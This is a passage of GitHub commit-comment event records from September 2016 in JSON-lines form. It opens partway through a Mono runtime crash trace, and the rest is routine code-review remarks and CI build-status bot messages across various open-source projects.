<unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) Gtk.Application.gtk_main () <0x00059>\r\n  at Gtk.Application.Run () <0x0000b>\r\n  at Xwt.GtkBackend.GtkEngine.RunApplication () <0x0000b>\r\n  at Xwt.Application.<Run>m__0 () <0x0001c>\r\n  at Xwt.Toolkit.InvokePlatformCode (System.Action) <0x0004a>\r\n  at Xwt.Application.Run () <0x00173>\r\n  at Samples.App.Run (Xwt.ToolkitType) <0x0004f>\r\n  at GtkTest.MainClass.Main (string[]) <0x0000f>\r\n  at (wrapper runtime-invoke) <Module>.runtime_invoke_void_object (object,intptr,intptr,intptr) <0x000d1>\r\n\r\nNative stacktrace:\r\n\r\n\tmono(+0xc37a4) [0x5637ea6227a4]\r\n\t/lib64/libpthread.so.0(+0x10c30) [0x7f89975cac30]\r\n\t/lib64/libc.so.6(gsignal+0x35) [0x7f89970156f5]\r\n\t/lib64/libc.so.6(abort+0x16a) [0x7f89970172fa]\r\n\tmono(+0x2724a9) [0x5637ea7d14a9]\r\n\tmono(+0x27273c) [0x5637ea7d173c]\r\n\tmono(+0x2728d3) [0x5637ea7d18d3]\r\n\tmono(+0x1d831a) [0x5637ea73731a]\r\n\tmono(mono_runtime_cleanup+0xe) [0x5637ea73028e]\r\n\tmono(+0x39a75) [0x5637ea598a75]\r\n\tmono(+0x16013b) [0x5637ea6bf13b]\r\n\t[0x414116a9]\r\n\r\nDebug info from gdb:\r\n\r\n[New LWP 28620]\r\n[New LWP 28622]\r\n[New LWP 28623]\r\nMono support loaded.\r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\r\n0x00007f89975ca80b in __waitpid (pid=pid@entry=28624, stat_loc=stat_loc@entry=0x7fff7b57c3ac, options=options@entry=0) at ../sysdeps/unix/sysv/linux/waitpid.c:29\r\n29\t  return SYSCALL_CANCEL (wait4, pid, stat_loc, options, NULL);\r\n  Id   Target Id         Frame \r\n* 1    Thread 0x7f89980c4780 (LWP 28619) \"mono\" 0x00007f89975ca80b in __waitpid (pid=pid@entry=28624, stat_loc=stat_loc@entry=0x7fff7b57c3ac, options=options@entry=0) at ../sysdeps/unix/sysv/linux/waitpid.c:29\r\n  2    Thread 0x7f898ffff700 (LWP 28620) \"mono\" pthread_cond_wait@@GLIBC_2.3.2 () at ../sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:185\r\n  3    Thread 0x7f897e98d700 (LWP 28622) \"gmain\" 0x00007f89970d83ed in poll () at ../sysdeps/unix/syscall-template.S:84\r\n  4    Thread 0x7f897e18c700 (LWP 28623) \"gdbus\" 0x00007f89970d83ed in poll () at ../sysdeps/unix/syscall-template.S:84\r\n\r\nThread 4 (Thread 0x7f897e18c700 (LWP 28623)):\r\n#0  0x00007f89970d83ed in poll () at ../sysdeps/unix/syscall-template.S:84\r\n#1  0x00007f8986751a06 in g_main_context_iterate.isra () at /lib64/libglib-2.0.so.0\r\n#2  0x00007f8986751d92 in g_main_loop_run () at /lib64/libglib-2.0.so.0\r\n#3  0x00007f8986d4ae46 in gdbus_shared_thread_func () at /lib64/libgio-2.0.so.0\r\n#4  0x00007f8986777cf5 in g_thread_proxy () at /lib64/libglib-2.0.so.0\r\n#5  0x00007f89975c15ca in start_thread (arg=0x7f897e18c700) at pthread_create.c:333\r\n#6  0x00007f89970e3f6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\r\n\r\nThread 3 (Thread 0x7f897e98d700 (LWP 28622)):\r\n#0  0x00007f89970d83ed in poll () at ../sysdeps/unix/syscall-template.S:84\r\n#1  0x00007f8986751a06 in g_main_context_iterate.isra () at /lib64/libglib-2.0.so.0\r\n#2  0x00007f8986751b1c in g_main_context_iteration () at /lib64/libglib-2.0.so.0\r\n#3  0x00007f8986751b61 in glib_worker_main () at /lib64/libglib-2.0.so.0\r\n#4  0x00007f8986777cf5 in g_thread_proxy () at /lib64/libglib-2.0.so.0\r\n#5  0x00007f89975c15ca in start_thread (arg=0x7f897e98d700) at pthread_create.c:333\r\n#6  0x00007f89970e3f6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\r\n\r\nThread 2 (Thread 0x7f898ffff700 (LWP 28620)):\r\n#0  0x00007f89975c6bd0 in pthread_cond_wait@@GLIBC_2.3.2 () at ../sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:185\r\n#1  0x00005637ea79864f in thread_func (mutex=0x5637eaafd460 <lock>, cond=0x5637eaafd420 <work_cond>) at ../../mono/utils/mono-os-mutex.h:105\r\n#2  0x00005637ea79864f in thread_func (thread_data=0x0) at sgen-thread-pool.c:118\r\n#3  0x00007f89975c15ca in start_thread (arg=0x7f898ffff700) at pthread_create.c:333\r\n#4  0x00007f89970e3f6d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\r\n\r\nThread 1 (Thread 0x7f89980c4780 (LWP 28619)):\r\n#0  0x00007f89975ca80b in __waitpid (pid=pid@entry=28624, stat_loc=stat_loc@entry=0x7fff7b57c3ac, options=options@entry=0) at ../sysdeps/unix/sysv/linux/waitpid.c:29\r\n#1  0x00005637ea622880 in mono_handle_native_sigsegv (signal=<optimized out>, ctx=<optimized out>, info=<optimized out>) at mini-exceptions.c:2348\r\n#2  0x00007f89975cac30 in <signal handler called> () at /lib64/libpthread.so.0\r\n#3  0x00007f89970156f5 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54\r\n#4  0x00007f89970172fa in __GI_abort () at abort.c:89\r\n#5  0x00005637ea7d14a9 in monoeg_log_default_handler (log_domain=<optimized out>, log_level=G_LOG_LEVEL_ERROR, message=<optimized out>, unused_data=<optimized out>) at goutput.c:233\r\n#6  0x00005637ea7d173c in monoeg_g_logv (log_domain=log_domain@entry=0x0, log_level=log_level@entry=G_LOG_LEVEL_ERROR, format=format@entry=0x5637ea7da960 \"* Assertion at %s:%d, condition `%s' not met\\n\", args=args@entry=0x7fff7b57d320) at goutput.c:113\r\n#7  0x00005637ea7d18d3 in monoeg_assertion_message (format=format@entry=0x5637ea7da960 \"* Assertion at %s:%d, condition `%s' not met\\n\") at goutput.c:133\r\n#8  0x00005637ea73731a in mono_gc_cleanup () at gc.c:867\r\n#9  0x00005637ea73028e in mono_runtime_cleanup (domain=domain@entry=0x5637ec9f8fa0) at appdomain.c:356\r\n#10 0x00005637ea598a75 in mini_cleanup (domain=0x5637ec9f8fa0) at mini-runtime.c:4017\r\n#11 0x00005637ea6bf13b in ves_icall_System_Environment_Exit (result=1) at icall.c:6148\r\n#12 0x00000000414116a9 in  ()\r\n#13 0x00005637ed534390 in  ()\r\n#14 0x0000000000000000 in  ()\r\n\r\n=================================================================\r\nGot a SIGABRT while executing native code. This usually indicates\r\na fatal error in the mono runtime or one of the native libraries \r\nused by your application.\r\n=================================================================\r\n\r\nAborted (core dumped)\r\n```\r\n"}},"created_at":"2016-09-26T22:06:32Z"}
{"id":"4620752623","type":"CommitCommentEvent","actor":{"login":"FredKSchott"},"repo":{"name":"Polymer/polymer-analyzer"},"payload":{"comment":{"id":19180910,"position":7,"line":7,"path":".vscode/settings.json","commit_id":"b9b77fded43b1800e82c6cf3df51dc195a3db6b6","created_at":"2016-09-26T22:06:44Z","updated_at":"2016-09-26T22:06:44Z","body":"ugh you're right I misunderstood this usage. I'll revert this now"}},"created_at":"2016-09-26T22:06:44Z"}
{"id":"4620753472","type":"CommitCommentEvent","actor":{"login":"marchdf"},"repo":{"name":"trilinos/Trilinos"},"payload":{"comment":{"id":19180912,"position":19,"line":175,"path":"packages/xpetra/src/CrsMatrix/Xpetra_TpetraCrsMatrix.hpp","commit_id":"e822292bbcd8ed05aa65622338e79afb3948fecb","created_at":"2016-09-26T22:06:54Z","updated_at":"2016-09-26T22:06:54Z","body":"Something seems to have broken my build here. With GCC 5.2 and Openmpi on NREL's Peregrine, I was able to build Trilinos a couple weeks ago but now I am getting the attached error.  I just wanted to see if you were aware of this and if you were intending a fix. Or maybe I am just doing something wrong :) \r\n![screen shot 2016-09-26 at 3 44 10 pm](https://cloud.githubusercontent.com/assets/15038415/18853577/294f28d6-8403-11e6-9705-64e19a2d97c5.png)\r\n"}},"created_at":"2016-09-26T22:06:54Z"}
{"id":"4620755076","type":"CommitCommentEvent","actor":{"login":"jcartwright"},"repo":{"name":"jcartwright/elixir-yatzy"},"payload":{"comment":{"id":19180917,"position":null,"line":null,"path":null,"commit_id":"abbb7296b44981cf372eadb3a971472367b87a88","created_at":"2016-09-26T22:07:15Z","updated_at":"2016-09-26T22:07:15Z","body":"![1__bash](https://cloud.githubusercontent.com/assets/2282/18853601/a931108e-840b-11e6-8687-b96dd17a62b6.png)\r\n"}},"created_at":"2016-09-26T22:07:15Z"}
{"id":"4620756507","type":"CommitCommentEvent","actor":{"login":"PF4Public"},"repo":{"name":"PF4Public/fetchmail"},"payload":{"comment":{"id":19180921,"position":null,"line":null,"path":null,"commit_id":"29ac3e5401c9c3a54ac3008249c4f4e1792214aa","created_at":"2016-09-26T22:07:32Z","updated_at":"2016-09-26T22:07:32Z","body":"See the other commit, I forgot \"IMAP\" once again"}},"created_at":"2016-09-26T22:07:32Z"}
{"id":"4620758762","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_drivers"},"payload":{"comment":{"id":19180931,"position":14,"line":399,"path":"python/lsst/pipe/drivers/constructCalibs.py","commit_id":"8149c4062dadb2ff3a99c3ba5bb5e61ec83e9cfa","created_at":"2016-09-26T22:08:02Z","updated_at":"2016-09-26T22:08:02Z","body":"Does this work? It looks to me like the two argument form to the `DateTime` constructor is expecting a time scale as the second argument and not a system, and `get` now takes two arguments (system and scale)."}},"created_at":"2016-09-26T22:08:02Z"}
{"id":"4620760161","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19180938,"position":42,"line":37,"path":"js/src/workers/ComputeAndInjectDiffsWorker.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-26T22:08:21Z","updated_at":"2016-09-26T22:08:21Z","body":"This string should be a constant."}},"created_at":"2016-09-26T22:08:21Z"}
{"id":"4620760795","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19180942,"position":null,"line":null,"path":null,"commit_id":"b01791ad51717a9dce9454535ba905d2011354a9","created_at":"2016-09-26T22:08:30Z","updated_at":"2016-09-26T22:08:30Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 271](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1237&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-26T22:08:30Z"}
{"id":"4620762071","type":"CommitCommentEvent","actor":{"login":"gregvanl"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":19180944,"position":null,"line":null,"path":null,"commit_id":"3f08a8db4339f2f5642c2f8c26866d96b8e50773","created_at":"2016-09-26T22:08:47Z","updated_at":"2016-09-26T22:08:47Z","body":"Not at all.  We've been wrestling with your very question. We think saying simply \"Mac\" will resonate with readers since the hardware is so tightly coupled to the OS software.\r\nAnd we're very happy that people take such an interest in our docs."}},"created_at":"2016-09-26T22:08:47Z"}
{"id":"4620762249","type":"CommitCommentEvent","actor":{"login":"talum"},"repo":{"name":"talum/learn-test"},"payload":{"comment":{"id":19180945,"position":null,"line":null,"path":null,"commit_id":"7a7d9ede52df95c47a4fc34ad843e71a9d32276d","created_at":"2016-09-26T22:08:50Z","updated_at":"2016-09-26T22:08:50Z","body":"whoa nice! "}},"created_at":"2016-09-26T22:08:50Z"}
{"id":"4620762897","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19180948,"position":39,"line":34,"path":"js/src/workers/ComputeAndInjectDiffsWorker.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-26T22:08:58Z","updated_at":"2016-09-26T22:08:58Z","body":"This could be moved out of this function. NBD though"}},"created_at":"2016-09-26T22:08:58Z"}
{"id":"4620766432","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180953,"position":69,"line":69,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T22:09:45Z","updated_at":"2016-09-26T22:09:45Z","body":"I think you made me put this here originally"}},"created_at":"2016-09-26T22:09:45Z"}
{"id":"4620766744","type":"CommitCommentEvent","actor":{"login":"vladen"},"repo":{"name":"Travix-International/frint"},"payload":{"comment":{"id":19180954,"position":75,"line":75,"path":"src/createApp.js","commit_id":"8b73173fae485e0cf995a035db7d1da649e277ca","created_at":"2016-09-26T22:09:50Z","updated_at":"2016-09-26T22:09:50Z","body":"`\r\nfunction getFactoryImpl(app, options, factoryName) {\r\n  if (!options) {\r\n    return null;\r\n  }\r\n  const FactoryClass = options.getOption('factories')[factoryName];\r\n  return FactoryClass\r\n    ? new FactoryClass({ app })\r\n    : getFactoryImpl(app, app.getRootApp(), factoryName);\r\n}\r\n\r\nclass BaseApp {\r\n  getFactory(factoryName) {\r\n    return getFactoryImpl(this, this, factoryName);\r\n  }\r\n // ...\r\n`"}},"created_at":"2016-09-26T22:09:50Z"}
{"id":"4620770734","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180965,"position":96,"line":96,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T22:10:35Z","updated_at":"2016-09-26T22:10:35Z","body":"So like... if it contains a :, check for the full thing probably?"}},"created_at":"2016-09-26T22:10:35Z"}
{"id":"4620773819","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19180971,"position":null,"line":null,"path":null,"commit_id":"db52ec89d7eef8847808366185891cffc645d34f","created_at":"2016-09-26T22:11:13Z","updated_at":"2016-09-26T22:11:13Z","body":"Yes, but https://github.com/xbmc/xbmc/pull/10543#issuecomment-249442803 adds id 12 (on RPi).\r\n"}},"created_at":"2016-09-26T22:11:13Z"}
{"id":"4620774237","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180973,"position":100,"line":100,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T22:11:18Z","updated_at":"2016-09-26T22:11:18Z","body":"Didn't you say that handleError will probably be configurable to not stop entirely?"}},"created_at":"2016-09-26T22:11:18Z"}
{"id":"4620775421","type":"CommitCommentEvent","actor":{"login":"glebm"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19180981,"position":13,"line":119,"path":"app/controllers/thredded/topics_controller.rb","commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-26T22:11:33Z","updated_at":"2016-09-26T22:11:33Z","body":"Good point, I'll change it."}},"created_at":"2016-09-26T22:11:33Z"}
{"id":"4620775761","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19180985,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-26T22:11:37Z","updated_at":"2016-09-26T22:11:37Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T22:11:37Z"}
{"id":"4620775773","type":"CommitCommentEvent","actor":{"login":"karissa"},"repo":{"name":"datproject/dat.land"},"payload":{"comment":{"id":19180986,"position":5,"line":74,"path":"client/js/models/archive.js","commit_id":"7d53c5e581603b57085c051ed4367713efcb9636","created_at":"2016-09-26T22:11:38Z","updated_at":"2016-09-26T22:11:38Z","body":"I think this won't work either because defaultState has already been mutated by this point. The defaultState object should be copied when the model is instantiated too"}},"created_at":"2016-09-26T22:11:38Z"}
{"id":"4620781839","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19181000,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:12:53Z","updated_at":"2016-09-26T22:12:53Z","body":"I suspect `Label.StyleGetProperty (\"link-color\")` return null with gtk3."}},"created_at":"2016-09-26T22:12:53Z"}
{"id":"4620791346","type":"CommitCommentEvent","actor":{"login":"phil65"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19181019,"position":null,"line":null,"path":null,"commit_id":"db52ec89d7eef8847808366185891cffc645d34f","created_at":"2016-09-26T22:14:59Z","updated_at":"2016-09-26T22:14:59Z","body":"@Memphiz you also need to change the max limit in the line i mentioned? or am i wrong?"}},"created_at":"2016-09-26T22:14:59Z"}
{"id":"4620791901","type":"CommitCommentEvent","actor":{"login":"glebm"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19181024,"position":null,"line":null,"path":null,"commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-26T22:15:06Z","updated_at":"2016-09-26T22:15:06Z","body":"> would be good to get a heads up on breaking changes like this before they go into master.\r\n\r\nSorry, will do next time!"}},"created_at":"2016-09-26T22:15:06Z"}
{"id":"4620793198","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19181030,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T22:15:24Z","updated_at":"2016-09-26T22:15:24Z","body":"You can do better than that!\r\nIt only occupied one slot of my email!"}},"created_at":"2016-09-26T22:15:24Z"}
{"id":"4620797465","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181046,"position":23,"line":23,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:16:20Z","updated_at":"2016-09-26T22:16:20Z","body":"Для начала, заимей какой-нибудь форматтер типа clang-format. Если ты в Атоме каком-нибудь пишешь, там даже есть плагин \"clang-format\""}},"created_at":"2016-09-26T22:16:20Z"}
{"id":"4620800814","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19181063,"position":53,"line":53,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-26T22:17:04Z","updated_at":"2016-09-26T22:17:04Z","body":"What about:\r\n\r\n```js\r\nreturn new Array(count).fill('+');\r\n```"}},"created_at":"2016-09-26T22:17:04Z"}
{"id":"4620800881","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19181064,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-26T22:17:05Z","updated_at":"2016-09-26T22:17:05Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-26T22:17:05Z"}
{"id":"4620802241","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19181069,"position":null,"line":null,"path":null,"commit_id":"37550da93cd62fc5200dd88719e09bf9c121aa2e","created_at":"2016-09-26T22:17:22Z","updated_at":"2016-09-26T22:17:22Z","body":"What type of exploit?"}},"created_at":"2016-09-26T22:17:22Z"}
{"id":"4620802881","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19181072,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-26T22:17:29Z","updated_at":"2016-09-26T22:17:29Z","body":"@kbenne FYI"}},"created_at":"2016-09-26T22:17:29Z"}
{"id":"4620803949","type":"CommitCommentEvent","actor":{"login":"vladen"},"repo":{"name":"Travix-International/frint"},"payload":{"comment":{"id":19181075,"position":12,"line":12,"path":"src/createApp.js","commit_id":"8b73173fae485e0cf995a035db7d1da649e277ca","created_at":"2016-09-26T22:17:42Z","updated_at":"2016-09-26T22:17:42Z","body":"Some of this options (not intended to be exposed for public access) are very good candidates to be stored in the private WeakMap with `this` (App instance) as a key. The same private store could be imported from external file exporting it as a singleton instance from this mofule and all other modules that are interested in direct access to the private stuff of Apps."}},"created_at":"2016-09-26T22:17:42Z"}
{"id":"4620804651","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181079,"position":21,"line":21,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:17:52Z","updated_at":"2016-09-26T22:17:52Z","body":"заимей привычку писать определение переменной непосредственно перед объявлением функции, в которой ты будешь её использовать. Это повышает читабельность и не заставляет хранить в голове все объявления"}},"created_at":"2016-09-26T22:17:52Z"}
{"id":"4620808962","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181094,"position":33,"line":33,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:18:48Z","updated_at":"2016-09-26T22:18:48Z","body":"int N = 0; ибо оно больше нигде, кроме как в этом цикле, не используется. "}},"created_at":"2016-09-26T22:18:48Z"}
{"id":"4620809455","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181095,"position":18,"line":18,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:18:54Z","updated_at":"2016-09-26T22:18:54Z","body":"выпили"}},"created_at":"2016-09-26T22:18:54Z"}
{"id":"4620810246","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19181096,"position":13,"line":13,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-26T22:19:05Z","updated_at":"2016-09-26T22:19:05Z","body":"This could also be\r\n\r\n```js\r\nreturn new Array(height).fill(new Int32Array(width));\r\n```"}},"created_at":"2016-09-26T22:19:05Z"}
{"id":"4620810981","type":"CommitCommentEvent","actor":{"login":"ktajpuri"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19181097,"position":4,"line":0,"path":"client/commonFramework/detect-unsafe-code-stream.js","commit_id":"d5c3731536847d65aa76f3a344af40c4c17ecde3","created_at":"2016-09-26T22:19:11Z","updated_at":"2016-09-26T22:19:11Z","body":"could you please explain this regex ? I tried to figure out but seems too tough for me."}},"created_at":"2016-09-26T22:19:11Z"}
{"id":"4620813394","type":"CommitCommentEvent","actor":{"login":"0rland0"},"repo":{"name":"0rland0/0rland0.github.io"},"payload":{"comment":{"id":19181105,"position":null,"line":null,"path":null,"commit_id":"2c806135c9c0fd2738ce32b6db3aa3f4cea832ad","created_at":"2016-09-26T22:19:46Z","updated_at":"2016-09-26T22:19:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [\"Contact us\" on Website](https://trello.com/c/se9Qq0zl/36-contact-us-on-website)"}},"created_at":"2016-09-26T22:19:46Z"}
{"id":"4620814749","type":"CommitCommentEvent","actor":{"login":"0rland0"},"repo":{"name":"0rland0/0rland0.github.io"},"payload":{"comment":{"id":19181110,"position":null,"line":null,"path":null,"commit_id":"e8dfce74a3e055e95f901fd3e86b7b75cc631b43","created_at":"2016-09-26T22:20:04Z","updated_at":"2016-09-26T22:20:04Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [\"Contact us\" on Website](https://trello.com/c/se9Qq0zl/36-contact-us-on-website)"}},"created_at":"2016-09-26T22:20:04Z"}
{"id":"4620815736","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181112,"position":89,"line":89,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:20:16Z","updated_at":"2016-09-26T22:20:16Z","body":"strcmp()"}},"created_at":"2016-09-26T22:20:16Z"}
{"id":"4620816144","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19181117,"position":35,"line":35,"path":"wcfsetup/install/files/lib/system/event/listener/AbstractHtmlInputNodeProcessorListener.class.php","commit_id":"f1e6e7ece05bef7d1252144aa90a48e09bf5a5c6","created_at":"2016-09-26T22:20:21Z","updated_at":"2016-09-26T22:20:21Z","body":"Consider using named groups for readability."}},"created_at":"2016-09-26T22:20:21Z"}
{"id":"4620817865","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181123,"position":102,"line":102,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:20:44Z","updated_at":"2016-09-26T22:20:44Z","body":"file_open -> open_file"}},"created_at":"2016-09-26T22:20:44Z"}
{"id":"4620818458","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181126,"position":102,"line":102,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:20:52Z","updated_at":"2016-09-26T22:20:52Z","body":"name_file -> file_name"}},"created_at":"2016-09-26T22:20:52Z"}
{"id":"4620820853","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19181135,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-26T22:21:25Z","updated_at":"2016-09-26T22:21:25Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T22:21:25Z"}
{"id":"4620821694","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181140,"position":114,"line":114,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:21:37Z","updated_at":"2016-09-26T22:21:37Z","body":"write_in_file"}},"created_at":"2016-09-26T22:21:37Z"}
{"id":"4620822735","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19181148,"position":124,"line":124,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"561cdbf22fc1b092676a61febbe92d215a31f160","created_at":"2016-09-26T22:21:51Z","updated_at":"2016-09-26T22:21:51Z","body":"close_file"}},"created_at":"2016-09-26T22:21:51Z"}
